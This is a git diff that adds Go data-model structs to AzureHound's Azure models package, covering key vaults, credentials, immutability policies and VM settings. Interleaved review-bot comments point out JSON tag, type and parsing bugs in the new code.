+ // Specify 'latest' to use the latest version of an image available at deploy time. Even if you use 'latest',
+ // the VM image will not automatically update after deploy time even if a new version becomes available.
+ Version string `json:"version,omitempty"`
+}
diff --git a/models/azure/immutability_policy.go b/models/azure/immutability_policy.go
new file mode 100644
index 0000000..febe7ac
--- /dev/null
+++ b/models/azure/immutability_policy.go
@@ -0,0 +1,24 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type ImmutabilityPolicy struct {
+ Etag string `json:"etag,omitempty"`
+ Properties ImmutabilityPolicyProperties `json:"properties,omitempty"`
+ UpdateHistory ImmutablePolicyUpdateHistory `json:"updateHistory,omitempty"`
+}
diff --git a/models/azure/immutability_policy_properties.go b/models/azure/immutability_policy_properties.go
new file mode 100644
index 0000000..7fea6d2
--- /dev/null
+++ b/models/azure/immutability_policy_properties.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type ImmutabilityPolicyProperties struct {
+ AllowProtectedAppendWrites bool `json:"allowProtectedAppendWrites,omitempty"`
+ AllowProtectedAppendWritesAll bool `json:"allowProtectedAppendWritesAll,omitempty"`
+ ImmutabilityPeriodSinceCreationInDays int `json:"immutabilityPeriodSinceCreationInDays,omitempty"`
+ State enums.ImmutabilityPolicyState `json:"updateHistory,omitempty"`
+}
diff --git a/models/azure/immutable_policy_update_history.go b/models/azure/immutable_policy_update_history.go
new file mode 100644
index 0000000..d4110ef
--- /dev/null
+++ b/models/azure/immutable_policy_update_history.go
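Review bot: The `State` field of `ImmutabilityPolicyProperties` carries the tag `json:"updateHistory,omitempty"`, which looks copied from `ImmutabilityPolicy.UpdateHistory` in immutability_policy.go; the decoder would then look for the enum under the wrong key and `State` would stay at its zero value. `AccountImmutabilityPolicyProperties` in immutable_storage_account.go tags its equivalent field `json:"state,omitempty"`, so the tag here should most likely be `json:"state,omitempty"` as well. As written, the policy state would be silently absent from whatever is collected through this struct, which matters to anyone relying on the output to judge whether immutability is actually enforced. A small unmarshal test with a sample payload would catch this class of tag error across the model package.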
@@ -0,0 +1,31 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type ImmutablePolicyUpdateHistory struct {
+ AllowProtectedAppendWrites bool `json:"allowProtectedAppendWrites,omitempty"`
+ AllowProtectedAppendWritesAll bool `json:"allowProtectedAppendWritesAll,omitempty"`
+ ImmutabilityPeriodSinceCreationInDays int `json:"immutabilityPeriodSinceCreationInDays,omitempty"`
+ ObjectIdentifier string `json:"objectIdentifier,omitempty"`
+ TenantId string `json:"tenantId,omitempty"`
+ Timestamp string `json:"timestamp,omitempty"`
+ Update enums.ImmutabilityPolicyUpdateType `json:"update,omitempty"`
+ Upn string `json:"upn,omitempty"`
+}
diff --git a/models/azure/immutable_storage_account.go b/models/azure/immutable_storage_account.go
new file mode 100644
index 0000000..6ef2b8b
--- /dev/null
+++ b/models/azure/immutable_storage_account.go
@@ -0,0 +1,31 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type ImmutableStorageAccount struct {
+ Enabled bool `json:"enabled,omitempty"`
+ ImmutabilityPolicy AccountImmutabilityPolicyProperties `json:"immutabilityPolicy,omitempty"`
+}
+
+type AccountImmutabilityPolicyProperties struct {
+ AllowProtectedAppendWrites bool `json:"allowProtectedAppendWrites,omitempty"`
+ ImmutabilityPeriodSinceCreationInDays int `json:"immutabilityPeriodSinceCreationInDays,omitempty"`
+ State enums.AccountImmutabilityPolicyState `json:"state,omitempty"`
+}
diff --git a/models/azure/immutable_storage_with_versioning.go b/models/azure/immutable_storage_with_versioning.go
new file mode 100644
index 0000000..43a314c
--- /dev/null
+++ b/models/azure/immutable_storage_with_versioning.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type ImmutableStorageWithVersioning struct {
+ Enabled bool `json:"enabled,omitempty"`
+ MigrationState enums.MigrationState `json:"migrationState,omitempty"`
+ TimeStamp string `json:"timeStamp,omitempty"`
+}
diff --git a/models/azure/implicit_grant_settings.go b/models/azure/implicit_grant_settings.go
new file mode 100644
index 0000000..e17b472
--- /dev/null
+++ b/models/azure/implicit_grant_settings.go
@@ -0,0 +1,29 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Specifies whether this web application can request tokens using the OAuth 2.0 implicit flow. Separate properties are
+// available to request ID and access tokens as part of the implicit flow. To enable implicit flow, at least one of the
+// following properties must be set to true.
+type ImplicitGrantSettings struct {
+ // Specifies whether this web application can request an ID token using the OAuth 2.0 implicit flow.
+ EnableIdTokenIssuance bool `json:"enableIdTokenIssuance,omitempty"`
+
+ // Specifies whether this web application can request an access token using the OAuth 2.0 implicit flow.
+ EnableAccessTokenIssuance bool `json:"enableAccessTokenIssuance,omitempty"`
+}
diff --git a/models/azure/informational_url.go b/models/azure/informational_url.go
new file mode 100644
index 0000000..d4f7ea0
--- /dev/null
+++ b/models/azure/informational_url.go
@@ -0,0 +1,37 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Basic profile information of the application.
+// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/informationalurl?view=graph-rest-1.0
+type InformationalUrl struct {
+ // CDN URL to the application's logo, Read-only.
+ LogoUrl string `json:"logoUrl,omitempty"`
+
+ // Link to the application's marketing page. For example, https://www.contoso.com/app/marketing
+ MarketingUrl string `json:"marketingUrl,omitempty"`
+
+ // Link to the application's privacy statement. For example, https://www.contoso.com/app/privacy
+ PrivacyStatementUrl string `json:"privacyStatementUrl,omitempty"`
+
+ // Link to the application's support page. For example, https://www.contoso.com/app/support
+ SupportUrl string `json:"supportUrl,omitempty"`
+
+ // Link to the application's terms of service statement. For example, https://www.contoso.com/app/termsofservice
+ TermsOfServiceUrl string `json:"termsOfServiceUrl,omitempty"`
+}
diff --git a/models/azure/instance_view_status.go b/models/azure/instance_view_status.go
new file mode 100644
index 0000000..8665276
--- /dev/null
+++ b/models/azure/instance_view_status.go
@@ -0,0 +1,37 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type InstanceViewStatus struct {
+ // The status code.
+ Code string `json:"code,omitempty"`
+
+ // The short localizable label for the status.
+ DisplayStatus string `json:"displayStatus,omitempty"`
+
+ // The level code.
+ Level enums.StatusLevel `json:"level,omitempty"`
+
+ // The detailed status message, including for alerts and error messages.
+ Message string `json:"message,omitempty"`
+
+ // The time of the status.
+ Time string `json:"time,omitempty"`
+}
diff --git a/models/azure/ip_rule.go b/models/azure/ip_rule.go
new file mode 100644
index 0000000..481b5df
--- /dev/null
+++ b/models/azure/ip_rule.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// A rule governing the accessibility of a vault from a specific ip address or ip range.
+type IPRule struct {
+ // An IPv4 address range in CIDR notation, such as '124.56.78.91' (simple IP address)
+ // or '124.56.78.0/24' (all addresses that start with 124.56.78).
+ Value string `json:"value,omitempty"`
+}
diff --git a/models/azure/ip_security_restriction.go b/models/azure/ip_security_restriction.go
new file mode 100644
index 0000000..414d6d2
--- /dev/null
+++ b/models/azure/ip_security_restriction.go
@@ -0,0 +1,34 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type IpSecurityRestriction struct {
+ Action string `json:"action,omitempty"`
+ Description string `json:"description,omitempty"`
+ Headers interface{} `json:"headers,omitempty"`
+ IpAddress string `json:"ipAddress,omitempty"`
+ Name string `json:"name,omitempty"`
+ Priority int `json:"priority,omitempty"`
+ SubnetMask string `json:"subnetMask,omitempty"`
+ SubnetTrafficTag int `json:"subnetTrafficTag,omitempty"`
+ Tag enums.IpFilterTag `json:"tag,omitempty"`
+ VnetSubnetResourceId string `json:"vnetSubnetResourceId,omitempty"`
+ VnetTrafficTag int `json:"vnetTrafficTag,omitempty"`
+}
diff --git a/models/azure/key_credential.go b/models/azure/key_credential.go
new file mode 100644
index 0000000..e81bdef
--- /dev/null
+++ b/models/azure/key_credential.go
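Review bot: `IpSecurityRestriction` and all of its fields are undocumented, while the neighbouring models in this patch comment every field, and `Action` is a bare `string` even though `Tag` already gets a typed enum. These fields presumably describe which sources may reach a resource, so a reader should not have to guess at the value set: add a doc comment on the type (`// IpSecurityRestriction describes one IP-based access restriction rule.`) and state on `Action` which values the API returns. The type name also spells the initialism `Ip` where ip_rule.go in the same package uses `IPRule`.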
@@ -0,0 +1,56 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/gofrs/uuid"
+
+// Contains a key credential associated with an application.
+// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/keycredential?view=graph-rest-1.0
+type KeyCredential struct {
+ // Custom key identifier
+ // Base64Url encoded.
+ CustomKeyIdentifier string `json:"customKeyIdentifier,omitempty"`
+
+ // Friendly name for the key.
+ // Optional.
+ DisplayName string `json:"displayName,omitempty"`
+
+ // The date and time at which the credential expires.
+ // The Timestamp type represents date and time information using ISO 8601 format and is always in UTC time.
+ // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z.
+ EndDateTime string `json:"endDateTime,omitempty"`
+
+ // The certificate's raw data in byte array converted to Base64 string;
+ // For example, [System.Convert]::ToBase64String($Cert.GetRawCertData()).
+ // Base64Url encoded.
+ Key []byte `json:"key,omitempty"`
+
+ // The unique identifier (GUID) for the key.
+ KeyId uuid.UUID `json:"keyId,omitempty"`
+
+ // The date and time at which the credential becomes valid.The Timestamp type represents date and time information
+ // using ISO 8601 format and is always in UTC time.
+ // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z.
+ StartDateTime string `json:"startDateTime,omitempty"`
+
+ // The type of key credential; for example, Symmetric.
+ Type string `json:"type,omitempty"`
+
+ // A string that describes the purpose for which the key can be used; for example, Verify.
+ Usage string `json:"usage,omitempty"`
+}
diff --git a/models/azure/key_value.go b/models/azure/key_value.go
new file mode 100644
index 0000000..a814ba5
--- /dev/null
+++ b/models/azure/key_value.go
@@ -0,0 +1,23 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type KeyValue struct {
+ Key string `json:"key,omitempty"`
+ Value string `json:"value,omitempty"`
+}
diff --git a/models/azure/key_vault.go b/models/azure/key_vault.go
new file mode 100644
index 0000000..0588310
--- /dev/null
+++ b/models/azure/key_vault.go
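Review bot: In `KeyCredential`, `Key []byte` is commented as "Base64Url encoded", but encoding/json decodes a `[]byte` field with the standard base64 alphabet, so a value that really uses the URL-safe alphabet (`-` and `_`, or no padding) makes the unmarshal return an error. The comment and the field type should agree: if the API returns standard base64, correct the comment; otherwise keep the field as `string` and decode it explicitly with `base64.URLEncoding` or `base64.RawURLEncoding`. The same "Base64Url encoded" remark sits on `CustomKeyIdentifier`, which is a plain `string` and is not decoded at all, so say there that the value is kept in its encoded form.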
@@ -0,0 +1,58 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "strings"
+
+// Resource information with extended details.
+type KeyVault struct {
+ Entity
+
+ // Azure location of the key vault resource.
+ Location string `json:"location,omitempty"`
+
+ // Name of the key vault resource.
+ Name string `json:"name,omitempty"`
+
+ // Properties of the vault
+ Properties VaultProperties `json:"properties,omitempty"`
+
+ // Tags assigned to the key vault resource.
+ Tags map[string]string `json:"tags,omitempty"`
+
+ // Resource type.
+ Type string `json:"type,omitempty"`
+}
+
+func (s KeyVault) ResourceGroupName() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 4 {
+ return parts[4]
+ } else {
+ return ""
+ }
+}
+
+func (s KeyVault) ResourceGroupId() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 5 {
+ return strings.Join(parts[:5], "/")
+ } else {
+ return ""
+ }
+}
diff --git a/models/azure/key_vault_key_ref.go b/models/azure/key_vault_key_ref.go
new file mode 100644
index 0000000..871bf9a
--- /dev/null
+++ b/models/azure/key_vault_key_ref.go
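Review bot: `KeyVault.ResourceGroupName` and `ResourceGroupId` pick the resource group purely by position in `s.Id` and never check that the fourth path segment is `resourceGroups`, so an ID of any other shape silently yields an unrelated segment as the group. The guard should name the segment, e.g. `if len(parts) > 4 && strings.EqualFold(parts[3], "resourceGroups") { return parts[4] }` followed by a plain `return ""`, which also removes the `else` after `return`. The two methods use different thresholds (`> 4` and `> 5`), so an ID that ends at the resource group returns a name but an empty ID; if that is intended, a comment should say so. Both methods lack doc comments, and the `LogicApp` methods in models/azure/logic_app.go repeat the same code and would benefit from one shared helper.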
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Describes a reference to a Key Vault Key
+type KeyVaultKeyReference struct {
+ // The URL referencing a key encryption key in Key Vault.
+ KeyUrl string `json:"keyUrl,omitempty"`
+
+ // The relative URL of the Key Vault containing the key.
+ SourceVault SubResource `json:"sourceVault,omitempty"`
+}
diff --git a/models/azure/key_vault_secret_ref.go b/models/azure/key_vault_secret_ref.go
new file mode 100644
index 0000000..603487b
--- /dev/null
+++ b/models/azure/key_vault_secret_ref.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Describes a reference to a Key Vault Secret.
+type KeyVaultSecretReference struct {
+ // The URL referencing a secret in a Key Vault.
+ SecretUrl string `json:"secretUrl,omitempty"`
+
+ // The relative URL of the Key Vault containing the secret.
+ SourceVault SubResource `json:"sourceVault,omitempty"`
+}
diff --git a/models/azure/keyvault_permissions.go b/models/azure/keyvault_permissions.go
new file mode 100644
index 0000000..e76aba9
--- /dev/null
+++ b/models/azure/keyvault_permissions.go
@@ -0,0 +1,33 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Permissions the identity has for keys, secrets, certificates and storage.
+type KeyVaultPermissions struct {
+ // Permissions to certificates
+ Certificates []string `json:"certificates,omitempty"`
+
+ // Permissions to keys
+ Keys []string `json:"keys,omitempty"`
+
+ // Permissions to secrets
+ Secrets []string `json:"secrets,omitempty"`
+
+ // Permissions to storage accounts
+ Storage []string `json:"storage,omitempty"`
+}
diff --git a/models/azure/last_patch_installation_summary.go b/models/azure/last_patch_installation_summary.go
new file mode 100644
index 0000000..2a2122c
--- /dev/null
+++ b/models/azure/last_patch_installation_summary.go
@@ -0,0 +1,60 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/enums"
+)
+
+// Describes the properties of the last installed patch summary.
+type LastPatchInstallationSummary struct {
+ // The errors that were encountered during execution of the operation. The details array contains the list of them.
+ Error ODataError `json:"error,omitempty"`
+
+ // The number of all available patches but excluded explicitly by a customer-specified exclusion list match.
+ ExcludedPatchCount int `json:"excludedPatchCount,omitempty"`
+
+ // The count of patches that failed installation.
+ FailedPatchCount int `json:"failedPatchCount,omitempty"`
+
+ // The activity ID of the operation that produced this result. It is used to correlate across CRP and extension logs.
+ InstallationActivityId string `json:"installationActivityId,omitempty"`
+
+ // The count of patches that successfully installed.
+ InstalledPatchCount int `json:"installedPatchCount,omitempty"`
+
+ // The UTC timestamp when the operation began.
+ LastModifiedTime string `json:"lastModifiedTime,omitempty"`
+
+ // Describes whether the operation ran out of time before it completed all its intended actions.
+ MaintenanceWindowExceeded bool `json:"maintenanceWindowExceeded,omitempty"`
+
+ // The number of all available patches but not going to be installed because it didn't match a classification or
+ // inclusion list entry.
+ NotSelectedPatchCount int `json:"notSelectedPatchCount,omitempty"`
+
+ // The number of all available patches expected to be installed over the course of the patch installation operation.
+ PendingPatchCount int `json:"pendingPatchCount,omitempty"`
+
+ // The UTC timestamp when the operation began.
+ StartTime string `json:"startTime,omitempty"`
+
+ // The overall success or failure status of the operation. It remains "InProgress" until the operation completes.
+ // At that point it will become "Unknown", "Failed", "Succeeded", or "CompletedWithWarnings."
+ Status enums.PatchStatus `json:"status,omitempty"`
+}
diff --git a/models/azure/license_assignment_state.go b/models/azure/license_assignment_state.go
new file mode 100644
index 0000000..5e1850e
--- /dev/null
+++ b/models/azure/license_assignment_state.go
@@ -0,0 +1,48 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/enums"
+)
+
+// Provides details about license assignments to a user.
+type LicenseAssignmentState struct {
+ // The id of the group that assigns this license. If direct-assigned this field will be null.
+ //
+ // Read-only
+ AssignedByGroup string `json:"assignedByGroup,omitempty"`
+
+ // The service plans that are disabled in this assignment.
+ //
+ // Read-only
+ DisabledPlans string `json:"disabledPlans,omitempty"`
+
+ // License assignment failure error.
+ Error enums.LicenseError `json:"error,omitempty"`
+
+ // The unique identifier for the SKU
+ //
+ // Read-only
+ SkuId string `json:"skuId,omitempty"`
+
+ // Indicates the current state of this assignment.
+ //
+ // Read-only
+ State enums.LicenseState `json:"state,omitempty"`
+}
diff --git a/models/azure/linux_config.go b/models/azure/linux_config.go
new file mode 100644
index 0000000..acee070
--- /dev/null
+++ b/models/azure/linux_config.go
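Review bot: `DisabledPlans` in `LicenseAssignmentState` is declared as `string`, but its own comment speaks of "the service plans" in the plural, and the Graph resource this struct models documents the property as a collection of GUIDs. If the API sends a JSON array, encoding/json reports an `UnmarshalTypeError` for the field and leaves it empty, and a caller that treats that error as fatal loses the whole record. `DisabledPlans []string` with the tag unchanged would decode it. A test that decodes a recorded response containing a non-empty `disabledPlans` would pin this down.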
@@ -0,0 +1,36 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Specifies the Linux operating system settings on the virtual machine.
+// For a list of supported Linux distributions, see Linux on Azure-Endorsed Distributions.
+type LinuxConfiguration struct {
+ // Specifies whether password authentication should be disabled.
+ DisablePasswordAuthentication bool `json:"disablePasswordAuthentication,omitempty"`
+
+ // [Preview Feature] Specifies settings related to VM Guest Patching on Linux.
+ PatchSettings LinuxPatchSettings `json:"patchSettings,omitempty"`
+
+ // Indicates whether virtual machine agent should be provisioned on the virtual machine.
+ // When this property is not specified in the request body, default behavior is to set it to true. This will ensure
+ // that VM Agent is installed on the VM so that extensions can be added to the VM later.
+ ProvisionVMAgent bool `json:"provisionVMAgent,omitempty"`
+
+ // Specifies the ssh key configuration for a Linux OS.
+ Ssh SshConfiguration `json:"ssh,omitempty"`
+}
diff --git a/models/azure/linux_patch_settings.go b/models/azure/linux_patch_settings.go
new file mode 100644
index 0000000..8b64672
--- /dev/null
+++ b/models/azure/linux_patch_settings.go
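Review bot: `DisablePasswordAuthentication` and `ProvisionVMAgent` in `LinuxConfiguration` are plain `bool`, so a response that omits the property decodes to `false`, exactly like an explicit `false`. For `DisablePasswordAuthentication` that makes a VM whose setting was not returned look the same as one that allows password logins, and for `ProvisionVMAgent` it contradicts the comment in this hunk, which gives the unspecified default as true. Pointer fields keep "absent" apart from "false": `DisablePasswordAuthentication *bool` and `ProvisionVMAgent *bool`, tags unchanged. With `omitempty` on a plain `bool`, an explicit `false` is also dropped when the struct is marshalled again, so the collected output cannot show it either.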
@@ -0,0 +1,33 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Specifies settings related to VM Guest Patching on Linux.
+type LinuxPatchSettings struct {
+ // Specifies the mode of VM Guest Patch Assessment for the IaaS virtual machine.
+ // Possible values are:
+ // ImageDefault - You control the timing of patch assessments on a virtual machine.
+ // AutomaticByPlatform - The platform will trigger periodic patch assessments. The property provisionVMAgent must be true.
+ AssessmentMode string `json:"assessmentMode,omitempty"`
+
+ // Specifies the mode of VM Guest Patching to IaaS virtual machine or virtual machines associated to virtual machine scale set with OrchestrationMode as Flexible.
+ // Possible values are:
+ // ImageDefault - The virtual machine's default patching configuration is used.
+ // AutomaticByPlatform - The virtual machine will be automatically updated by the platform. The property provisionVMAgent must be true
+ PatchMode string `json:"patchMode,omitempty"`
+}
